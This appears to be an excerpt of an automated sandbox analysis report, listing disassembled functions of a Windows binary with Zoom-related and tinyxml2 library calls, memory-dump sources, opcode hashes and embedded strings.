                • ??1XMLNode@tinyxml2@@MAE@XZ.RWSNDPQSKZ(9FB8111D,00000000,00000000,00D11AD4,000000FF,?,00CA5CF5,?,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?), ref: 00CB2357
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Document@tinyxml2@@Node@tinyxml2@@$Children@Clear@DeleteError@Error@2@Pair@tinyxml2@@Reset@
                • String ID:
                • API String ID: 423071938-0
                • Opcode ID: 4643eb4511cf46e216cc678c036e9c5514422073dd1b13f6b9bc4b6604615b31
                • Instruction ID: 68d11f84ca43643069f0c64dcd1f1b4e4d2260a266eb7148b56caefcd6322b53
                • Opcode Fuzzy Hash: 4643eb4511cf46e216cc678c036e9c5514422073dd1b13f6b9bc4b6604615b31
                • Instruction Fuzzy Hash: B2018B31504A84DFC725EB64D882BDAB7E8EB04710F40452EE467836D1EF74BA04DA60
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,00CB05D3,?,?,?,00CB0562,?,?,?,00CB23B9,?,?,00CB27AD), ref: 00CB09F4
                • ?MarkInUse@XMLDocument@tinyxml2@@QAEXQBVXMLNode@2@@Z.RWSNDPQSKZ(?,?,00CB05D3,?,?,?,00CB0562,?,?,?,00CB23B9,?,?,00CB27AD,?,?), ref: 00CB0A06
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,?,00CB05D3,?,?,?,00CB0562,?,?,?,00CB23B9,?,?,00CB27AD,?,?), ref: 00CB0A17
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00CB05D3,?,?,?,00CB0562,?,?,?,00CB23B9,?,?,00CB27AD,?,?), ref: 00CB0A29
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@State@Unlock@$Document@tinyxml2@@MarkNode@2@@Use@
                • String ID:
                • API String ID: 3334322719-0
                • Opcode ID: 94e27b4d30814b7c7ad58501d24324d9a7dd0b1e394f7d55ff3be05f981e3f5d
                • Instruction ID: 3187b9819ba19ce457b61e1dad2226e9635f24567650d5d81a90c64b65304d0c
                • Opcode Fuzzy Hash: 94e27b4d30814b7c7ad58501d24324d9a7dd0b1e394f7d55ff3be05f981e3f5d
                • Instruction Fuzzy Hash: 29F01D353003249BCB049F65D8D496EBBAEFF89660705806AED06DB351CF34EC028BA1
                APIs
                • ?SkipWhiteSpace@XMLUtil@tinyxml2@@SAPBDPBDPAH@Z.RWSNDPQSKZ(?,?,?,?,00CB27FC), ref: 00CB2A13
                  • Part of subcall function 00CA4220: ?IsWhiteSpace@XMLUtil@tinyxml2@@SA_ND@Z.RWSNDPQSKZ(00000001,?,?,00CB2A18,?,?,?,?,00CB27FC), ref: 00CA422B
                  • Part of subcall function 00CA4220: ?IsWhiteSpace@XMLUtil@tinyxml2@@SA_ND@Z.RWSNDPQSKZ(00000001,?,?,?,00CB2A18,?,?,?,?,00CB27FC), ref: 00CA4249
                • ?ReadBOM@XMLUtil@tinyxml2@@SAPBDPBDPA_N@Z.RWSNDPQSKZ(00000000,?,?,?,?,?,00CB27FC), ref: 00CB2A1D
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,0000000D,00000000,00000000,?,?,?,00CB27FC), ref: 00CB2A33
                  • Part of subcall function 00CB28E0: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,?,00CB23DA,?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?), ref: 00CB28FE
                  • Part of subcall function 00CB28E0: ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB2982
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000000,?,?,?,?,00CB27FC), ref: 00CB2A48
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Util@tinyxml2@@$Space@White$Pair@tinyxml2@@$Cmm@@Document@tinyxml2@@Error@Error@2@ReadReset@SkipState@Str@Unlock@
                • String ID:
                • API String ID: 4270378462-0
                • Opcode ID: 792b74e53a338099496bdf0d9f1809cd32d8967fa18d0d0a57bf55a8b782dc51
                • Instruction ID: 7357dc9a1495deb7fe54bf3aeace8f7b95ae106b8d590a81a3f588b30437f1ec
                • Opcode Fuzzy Hash: 792b74e53a338099496bdf0d9f1809cd32d8967fa18d0d0a57bf55a8b782dc51
                • Instruction Fuzzy Hash: FDF0B431A002117BD7256B70AC45FEA7BA9FF52314F100459F50197281EB64685296E1
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5CED3
                • ??0CSBMBMessage_OutlookMAPIEventChangeNotify@@QAE@XZ.RWSNDPQSKZ(00000074), ref: 00C5CEE0
                  • Part of subcall function 00C5C7A0: __EH_prolog3.LIBCMT ref: 00C5C7A7
                  • Part of subcall function 00C5C7A0: ??0?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5C7C7
                • ?SetItem2@?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z.RWSNDPQSKZ(?,00000074), ref: 00C5CEF4
                  • Part of subcall function 00C5C660: __EH_prolog3.LIBCMT ref: 00C5C667
                • ??1?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@UAE@XZ.RWSNDPQSKZ(00009E66,00000074), ref: 00C5CF17
                Similarity
                • API ID: String$Archive@Cmm@@Cmm@@@MessageTemplate_2@$H_prolog3$??0?$??1?$ChangeEventH00@H_prolog3_Item2@?$Message_Notify@@OutlookW@3@@
                • String ID:
                • API String ID: 3597761791-0
                • Opcode ID: 155d6fcc3560dc128c384b6fdf441a10cbed7713ebc7afe46c802af59941f506
                • Instruction ID: c2da4da40c4b8775473cdc7d487374b7dafdcb29b2bc6ad41d29f9d1d3cb7ae9
                • Opcode Fuzzy Hash: 155d6fcc3560dc128c384b6fdf441a10cbed7713ebc7afe46c802af59941f506
                • Instruction Fuzzy Hash: 79F068356103099BCF04FFA5D8C19AE7765AF54749B004029F805AB152DE70AA89D758
                APIs
                • __EH_prolog3.LIBCMT ref: 00CC08A7
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000004), ref: 00CC08C0
                  • Part of subcall function 00CC0670: CoCreateGuid.OLE32(?,?), ref: 00CC068B
                  • Part of subcall function 00CC0670: StringFromCLSID.OLE32(?,?), ref: 00CC069A
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(00D34CD0,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 00CC0900
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?,00D34CD0,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CC090C
                  • Part of subcall function 00C53EF0: ?erase@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z.RWSNDPQSKZ(00000000,000000FF,?,00C53DA1,00000000), ref: 00C53F06
                Similarity
                • API ID: String$Cmm@@$Assign@?$$??0?$?erase@?$CreateFromGuidH_prolog3U?$char_traits@_V01@@V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@
                • String ID:
                • API String ID: 4030975112-0
                • Opcode ID: 2cf7d28205c5aaea237fdc9ac6b3c6b49787ff5a69efea0eddc904b75c827003
                • Instruction ID: 9773dc8a2ef2ef2af242d1c1213f17c07970faddbc3e67b623bbfc00aca5f171
                • Opcode Fuzzy Hash: 2cf7d28205c5aaea237fdc9ac6b3c6b49787ff5a69efea0eddc904b75c827003
                • Instruction Fuzzy Hash: 21016270A05646EBDB04DF19D64169DF7A0BF04704F50513DE80597B42DBF0AA68DB94
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB0BB2
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(7FFFFFFF), ref: 00CB0BC9
                  • Part of subcall function 00CB04A0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00CB0AAA,?,?,?,00CB06F3,?,?,?,00CA56F2,00000000,000000B0,00CA5CDD,?,?), ref: 00CB04AB
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(00000000,7FFFFFFF), ref: 00CB0BD1
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00000000,7FFFFFFF), ref: 00CB0BD7
                Similarity
                • API ID: Cmm@@Node@tinyxml2@@State@Unlock@Value@$Equal@StringUtil@tinyxml2@@
                • String ID:
                • API String ID: 412887391-0
                • Opcode ID: 5f223344f583dc2ffb69b09d5b366fbd2359efec486d6ae0d88f03cbe9cabba8
                • Instruction ID: 08724cc1670b418dcc7a6c38eee4b74c36cdebdf8af32c931066cce066386bc0
                • Opcode Fuzzy Hash: 5f223344f583dc2ffb69b09d5b366fbd2359efec486d6ae0d88f03cbe9cabba8
                • Instruction Fuzzy Hash: D7E02B367043246B4D006718AC019EF739D9A86378B244125FD55E7342CF20ED0196E4
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB0CB2
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(7FFFFFFF), ref: 00CB0CC9
                  • Part of subcall function 00CB04A0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00CB0AAA,?,?,?,00CB06F3,?,?,?,00CA56F2,00000000,000000B0,00CA5CDD,?,?), ref: 00CB04AB
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(00000000,7FFFFFFF), ref: 00CB0CD1
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00000000,7FFFFFFF), ref: 00CB0CD7
                Similarity
                • API ID: Cmm@@Node@tinyxml2@@State@Unlock@Value@$Equal@StringUtil@tinyxml2@@
                • String ID:
                • API String ID: 412887391-0
                • Opcode ID: e9156c535e40956b7aa566d1bb4b0be3afe1524ea58026d37802e185fea2cff5
                • Instruction ID: 170045bbbef32c116dc2fb5ce2b5e1e6c8905c94ef2b63dd2fec1c88706f37f0
                • Opcode Fuzzy Hash: e9156c535e40956b7aa566d1bb4b0be3afe1524ea58026d37802e185fea2cff5
                • Instruction Fuzzy Hash: FEE02B767003246B4D046A18A8019EF775DAA86374B344365FD11E7342CF21FD0196E5
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB0DB2
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(7FFFFFFF), ref: 00CB0DC9
                  • Part of subcall function 00CB04A0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00CB0AAA,?,?,?,00CB06F3,?,?,?,00CA56F2,00000000,000000B0,00CA5CDD,?,?), ref: 00CB04AB
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(00000000,7FFFFFFF), ref: 00CB0DD1
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00000000,7FFFFFFF), ref: 00CB0DD7
                Similarity
                • API ID: Cmm@@Node@tinyxml2@@State@Unlock@Value@$Equal@StringUtil@tinyxml2@@
                • String ID:
                • API String ID: 412887391-0
                • Opcode ID: ccafcaa3a4cc6c874c562a77e0355aa7769b84cc02b7b1e02bfb218244d00fad
                • Instruction ID: e19f1c98f266b41755c6e3ddd834edb8cb9221547e37d0ca03a5f9c763d5c1a4
                • Opcode Fuzzy Hash: ccafcaa3a4cc6c874c562a77e0355aa7769b84cc02b7b1e02bfb218244d00fad
                • Instruction Fuzzy Hash: 99E02B767013246B4D006668AC019EF779D9B86374B244125FD55E7382CF20FD0196E4
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB0EB2
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(7FFFFFFF), ref: 00CB0EC9
                  • Part of subcall function 00CB04A0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00CB0AAA,?,?,?,00CB06F3,?,?,?,00CA56F2,00000000,000000B0,00CA5CDD,?,?), ref: 00CB04AB
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(00000000,7FFFFFFF), ref: 00CB0ED1
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00000000,7FFFFFFF), ref: 00CB0ED7
                Similarity
                • API ID: Cmm@@Node@tinyxml2@@State@Unlock@Value@$Equal@StringUtil@tinyxml2@@
                • String ID:
                • API String ID: 412887391-0
                • Opcode ID: 75cd87c2e2ad1abb385740681c1dbacfa5cabea5024ea73bde443749b2fdab69
                • Instruction ID: e215e2c4f8f4e0ca53bbf12848df2c3a3c29bdeb8ff3aec8e2c8811f6baf2dfa
                • Opcode Fuzzy Hash: 75cd87c2e2ad1abb385740681c1dbacfa5cabea5024ea73bde443749b2fdab69
                • Instruction Fuzzy Hash: 16E02B767003286B4E00A618A8019FF739D9A86374B244125FD95F7342CF21ED0196E5
                APIs
                • __EH_prolog3.LIBCMT ref: 00CA63B7
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000004), ref: 00CA63E1
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,00000004), ref: 00CA63F1
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000004), ref: 00CA6401
                Similarity
                • API ID: ??0?$Cmm@@StringV01@@$H_prolog3
                • String ID:
                • API String ID: 709177685-0
                • Opcode ID: d6c4f4ae25b760cfa485be36ea724f0fdd8678430df518c8ad55058c2c81f66f
                • Instruction ID: c73cf6faa20a57734f8e68ba5938f5707346f1dd8d9d2e68a7c97b1890d99e26
                • Opcode Fuzzy Hash: d6c4f4ae25b760cfa485be36ea724f0fdd8678430df518c8ad55058c2c81f66f
                • Instruction Fuzzy Hash: D2011DB5500B05EFC710DF29C480A9AF7F4BF58310B14CA2AE59A83B51DB71F958DB90
                APIs
                • WriteConsoleW.KERNEL32(00CF3121,00CE3349,?,00000000,00CF3121,?,00D038FB,00CF3121,00000001,00CF3121,00CF3121,?,00CF8102,00000000,8304488B,00CF3121), ref: 00D0C48E
                • GetLastError.KERNEL32(?,00D038FB,00CF3121,00000001,00CF3121,00CF3121,?,00CF8102,00000000,8304488B,00CF3121,00000000,00CF3121,?,00CF8656,00000010), ref: 00D0C49A
                  • Part of subcall function 00D0C460: CloseHandle.KERNEL32(FFFFFFFE,00D0C4AA,?,00D038FB,00CF3121,00000001,00CF3121,00CF3121,?,00CF8102,00000000,8304488B,00CF3121,00000000,00CF3121), ref: 00D0C470
                • ___initconout.LIBCMT ref: 00D0C4AA
                  • Part of subcall function 00D0C422: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D0C451,00D038E8,00CF3121,?,00CF8102,00000000,8304488B,00CF3121,00000000), ref: 00D0C435
                • WriteConsoleW.KERNEL32(00CF3121,00CE3349,?,00000000,?,00D038FB,00CF3121,00000001,00CF3121,00CF3121,?,00CF8102,00000000,8304488B,00CF3121,00000000), ref: 00D0C4BF
                Similarity
                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                • String ID:
                • API String ID: 2744216297-0
                • Opcode ID: 8fae212eceeb0904454f8fb045f535f7ddc3fb08dba880df2d743c248ce061d7
                • Instruction ID: 3eb5c0a38bfc34dbe314b2da2180934fa3fbc6dd37f38b4dc9819f197f8658bc
                • Opcode Fuzzy Hash: 8fae212eceeb0904454f8fb045f535f7ddc3fb08dba880df2d743c248ce061d7
                • Instruction Fuzzy Hash: 83F0F836411219BBCF622FE59C04A993F66FB083A1B048210FA1C85270CB32D821AFB4
                APIs
                • __EH_prolog3.LIBCMT ref: 00C781C7
                • EnterCriticalSection.KERNEL32(?,00000004), ref: 00C781D9
                • LeaveCriticalSection.KERNEL32(?,?,00000004), ref: 00C781F4
                • ?WakeUp@Channel@ssb_ipc@@QAE_NXZ.RWSNDPQSKZ(?,00000004), ref: 00C781FD
                Similarity
                • API ID: CriticalSection$Channel@ssb_ipc@@EnterH_prolog3LeaveWake
                • String ID:
                • API String ID: 1677816905-0
                • Opcode ID: 99ff07e9e16d07df1bc77415bcd29fc9b288aa8829948172ccb4138e6c6f5e2b
                • Instruction ID: 7cb71dc2c0ca5e45a28e9dba70be9ddd614ce9d16de22a11280d17cffc3ef211
                • Opcode Fuzzy Hash: 99ff07e9e16d07df1bc77415bcd29fc9b288aa8829948172ccb4138e6c6f5e2b
                • Instruction Fuzzy Hash: 25E09272C02B25A7CB11EF60D80AADEB364BF10B15F408225B91697251CF70AB4ACBF4
                APIs
                • ?DeleteChildren@XMLNode@tinyxml2@@QAEXXZ.RWSNDPQSKZ(?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?), ref: 00CB23B4
                • ?DeleteNode@XMLDocument@tinyxml2@@QAEXPAVXMLNode@2@@Z.RWSNDPQSKZ(?,?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001,00000000,000001C8,00CA29E7,?), ref: 00CB23C4
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001), ref: 00CB23D5
                Similarity
                • API ID: DeleteDocument@tinyxml2@@$Children@Error@Error@2@Node@Node@2@@Node@tinyxml2@@
                • String ID:
                • API String ID: 3736626447-0
                • Opcode ID: a8981787519500fa7e7ded6d387a5145510baadb64124f214804e0b983cace88
                • Instruction ID: 1773fd5c8be59ca6908521f47cdc9f558ed4914d217113ba3dd767ebe87d9d7a
                • Opcode Fuzzy Hash: a8981787519500fa7e7ded6d387a5145510baadb64124f214804e0b983cace88
                • Instruction Fuzzy Hash: 72E04F71500B909BCA316B2B9C05D8BBBE9EFC2750B11086FF44642621DAB5A805EA70
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00DFECA0,00DFECA8,?,?,?,00CE4E1F,00000064,?,00C62BE7,00DFFC8C), ref: 00CE4E9F
                • LeaveCriticalSection.KERNEL32(00DFECA8,?,?,00CE4E1F,00000064,?,00C62BE7,00DFFC8C), ref: 00CE4EAF
                • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00CE4E1F,00000064,?,00C62BE7,00DFFC8C), ref: 00CE4EC0
                • EnterCriticalSection.KERNEL32(00DFECA8,?,00CE4E1F,00000064,?,00C62BE7,00DFFC8C), ref: 00CE4EC7
                Similarity
                • API ID: CriticalSection$Cmm@@EnterLeaveObjectSingleState@Unlock@Wait
                • String ID:
                • API String ID: 974333809-0
                • Opcode ID: 89cebacbe2412024e7322f3034f9938b0d6e1e11cf864ef919605c5f860117a9
                • Instruction ID: eb462d94025cdb2063e144313296dced546c8ca3381badf58c9fbb96d34464aa
                • Opcode Fuzzy Hash: 89cebacbe2412024e7322f3034f9938b0d6e1e11cf864ef919605c5f860117a9
                • Instruction Fuzzy Hash: 37E0E532981728BFCA011B52EC19AE9BB2ABF05B52B028410FA05AA370CB7159419BF5
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C56157
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000024), ref: 00C56169
                • ??Y?$CStringT@D@Cmm@@QAEAAV01@PBD@Z.RWSNDPQSKZ(?,?,00000024), ref: 00C56175
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(00000000,?,00000024), ref: 00C5617D
                  • Part of subcall function 00C58567: _Deallocate.LIBCONCRT ref: 00C58576
                Similarity
                • API ID: Cmm@@String$??0?$V01@@$DeallocateH_prolog3_V01@
                • String ID:
                • API String ID: 1056643236-0
                • Opcode ID: c910574222003db9bac16509213f65630ed3fc19479b130418d3ae3755d533ec
                • Instruction ID: 744e345eb1ed6ca4baede5929f1b6a90a10c04ba2dee298da0a4afcb7b041403
                • Opcode Fuzzy Hash: c910574222003db9bac16509213f65630ed3fc19479b130418d3ae3755d533ec
                • Instruction Fuzzy Hash: DAE01279A00144AFCB05FBA4D451AFD7775AF94315F448044FC017B352CB746A49AF75
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C54327
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000024), ref: 00C54339
                • ??Y?$CStringT@_W@Cmm@@QAEAAV01@PB_W@Z.RWSNDPQSKZ(?,?,00000024), ref: 00C54345
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(00000000,?,00000024), ref: 00C5434D
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                Similarity
                • API ID: Cmm@@String$??0?$V01@@$DeallocateH_prolog3_V01@
                • String ID:
                • API String ID: 1056643236-0
                • Opcode ID: 9b78d0439ab3bb5db1f67dba7291ac070f7378327fc5e39111818c3410525607
                • Instruction ID: 18d69e3447b0f89b4f11d0cdb551031e09382b245ec558d8c6e8003c3c7fdd02
                • Opcode Fuzzy Hash: 9b78d0439ab3bb5db1f67dba7291ac070f7378327fc5e39111818c3410525607
                • Instruction Fuzzy Hash: 63E06D79A00104ABCB04FBA494416ED7771AF98315F409004FC4127741DB705A89AB25
                APIs
                • __startOneArgErrorHandling.LIBCMT ref: 00CFAE3D
                Similarity
                • API ID: ErrorHandling__start
                • String ID: pow
                • API String ID: 3213639722-2276729525
                • Opcode ID: df207be588225e460e7b148ae47f1009137bf5136a7d24d85675161529783ff6
                • Instruction ID: 42b648517641a703c2246b379423a5daa0f0e0fa6e98c19535527a8d2b2d8167
                • Opcode Fuzzy Hash: df207be588225e460e7b148ae47f1009137bf5136a7d24d85675161529783ff6
                • Instruction Fuzzy Hash: 1A5181E1D0820596CB617B14C90137AB7E4EB50710F288D68F5DD823E9EB34CDB59AB7
                APIs
                Strings
                • unordered_map/set too long, xrefs: 00CBA9F0
                Similarity
                • API ID: H_prolog3__floor_pentium4
                • String ID: unordered_map/set too long
                • API String ID: 2218291521-306623848
                • Opcode ID: d151df0efe168d3ed228cf808051ec49f02d10546b4e50056f4f6774661ca042
                • Instruction ID: 4b2b66cb9efe5257aaac1fca487a046ad1f7bf797dd792a1747349a2ef977627
                • Opcode Fuzzy Hash: d151df0efe168d3ed228cf808051ec49f02d10546b4e50056f4f6774661ca042
                • Instruction Fuzzy Hash: C451AC719007099FCB15DFA9C080AEDF7F4FF58314F20861AE496B7252EB71A982DB61
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBC696
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000000,?,00000018,unordered_map/set too long,?,?,00000000,?,?,00000000,00CB5234,?,?), ref: 00CBC6FC
                  • Part of subcall function 00CE2896: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00CE28A2
                Strings
                • unordered_map/set too long, xrefs: 00CBC7A4
                Similarity
                • API ID: ??0?$Cmm@@H_prolog3StringV01@@std::invalid_argument::invalid_argument
                • String ID: unordered_map/set too long
                • API String ID: 693385739-306623848
                • Opcode ID: 2ee6069c99842bf371e77fe9d8f233c7864fb62d10c76265ca64fe170c20c753
                • Instruction ID: bb80842561aae74cdb2d0827af715f609ca0a30961d52ba503c316ef6f8d58c4
                • Opcode Fuzzy Hash: 2ee6069c99842bf371e77fe9d8f233c7864fb62d10c76265ca64fe170c20c753
                • Instruction Fuzzy Hash: F931B4719006489FCB15DFB8C885BEEB7F4AF59301F108519F486B7252EB74AA84DB60
                APIs
                • __EH_prolog3.LIBCMT ref: 00C603A4
                  • Part of subcall function 00C60601: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?), ref: 00C60619
                  • Part of subcall function 00C6048E: __EH_prolog3_GS.LIBCMT ref: 00C60495
                  • Part of subcall function 00C6048E: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00D334D8,?,00000000,?,?,00000024,00C603DE,00000001,00600040,?,0000002C,00C5F3C5,?,?,?,?), ref: 00C604E3
                Similarity
                • API ID: Cmm@@State@Unlock@$H_prolog3H_prolog3_
                • String ID: endUTC$startUTC
                • API String ID: 2187001830-740499625
                • Opcode ID: 11d4a13bc35e110439792efde910a3f39e712f3addda9941edf3cc2aab3b3e2c
                • Instruction ID: 912c5bd106ca469bc34dce0bfdc6595cc2b71fbbbc86f2a209928dce9c53bf0d
                • Opcode Fuzzy Hash: 11d4a13bc35e110439792efde910a3f39e712f3addda9941edf3cc2aab3b3e2c
                • Instruction Fuzzy Hash: B8215E70940219AFDB15EBE4CCD2BFFBB78BF14308F244129B60176191DB74AA88DB64
                APIs
                Strings
                • invalid stoull argument, xrefs: 00C642F0
                • stoull argument out of range, xrefs: 00C642FA
                Similarity
                • API ID: H_prolog3_catch
                • String ID: invalid stoull argument$stoull argument out of range
                • API String ID: 3886170330-980025665
                • Opcode ID: 74343e9cc0f1d4114d350f44dd5d1a70e28a97c623ed4452b288cb8b84358db8
                • Instruction ID: a1d361b86fa667a52c92e35cbd30b9e328bb0bc201326630043ff0eb68f13f30
                • Opcode Fuzzy Hash: 74343e9cc0f1d4114d350f44dd5d1a70e28a97c623ed4452b288cb8b84358db8
                • Instruction Fuzzy Hash: 4FF0F632D40344DBCB38EFA4C4827AC73A0BF05311F658065F855AB241CB74AF04EBA2
                APIs
                Strings
                • invalid stoull argument, xrefs: 00C64270
                • stoull argument out of range, xrefs: 00C6427A
                Similarity
                • API ID: H_prolog3_catch
                • String ID: invalid stoull argument$stoull argument out of range
                • API String ID: 3886170330-980025665
                • Opcode ID: da11502fd37ff0183a0e6b6c72ff341109d9b17864357da0083e6362fbc041b6
                • Instruction ID: 40c4ed531480ab78699d960b32bb715fc69cce726c9e5fff015a36dd51c18b92
                • Opcode Fuzzy Hash: da11502fd37ff0183a0e6b6c72ff341109d9b17864357da0083e6362fbc041b6
                • Instruction Fuzzy Hash: 82F0F632E10304DFDB28FFA4C4427AC73B1AF41311F658064F9696B281DB749E44E7A2
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CBE431
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000218,00CBE52B,00000050,00CADE1F,00000004), ref: 00CBE45C
                Similarity
                • API ID: FileH_prolog3_ModuleName
                • String ID: debug.log
                • API String ID: 1315720902-600467936
                • Opcode ID: 72a120082ff0090b78d88e8f3dbc0f2efd0570524903287315c0c7259debdd7b
                • Instruction ID: 23bed062f72e34579e2a91e248bdd2d7871b3f17662f8e74c7a144975060b1cf
                • Opcode Fuzzy Hash: 72a120082ff0090b78d88e8f3dbc0f2efd0570524903287315c0c7259debdd7b
                • Instruction Fuzzy Hash: 441182B4A407149BC7209F65CC48ADDBAF5AF98700F40068DE045A7290CB745A899FA4
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000FA0,-00000020,00D01998,00D01998,-00000020,00000FA0,00000000,00000010,00C62E91), ref: 00D00245
                • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00D01998,-00000020,00000FA0,00000000,00000010,00C62E91), ref: 00D00255
                Strings
                • InitializeCriticalSectionEx, xrefs: 00D00225
                Similarity
                • API ID: Cmm@@CountCriticalInitializeSectionSpinState@Unlock@
                • String ID: InitializeCriticalSectionEx
                • API String ID: 2895262047-3084827643
                • Opcode ID: 109274e82b9f4800ed7613b6d51a6d825506c4a96deba05106bc3d7e4b1ba0ea
                • Instruction ID: ff082021ff36ce5fd8bd9185a6661f159b28c212d055bad16242cc5e5d7b802e
                • Opcode Fuzzy Hash: 109274e82b9f4800ed7613b6d51a6d825506c4a96deba05106bc3d7e4b1ba0ea
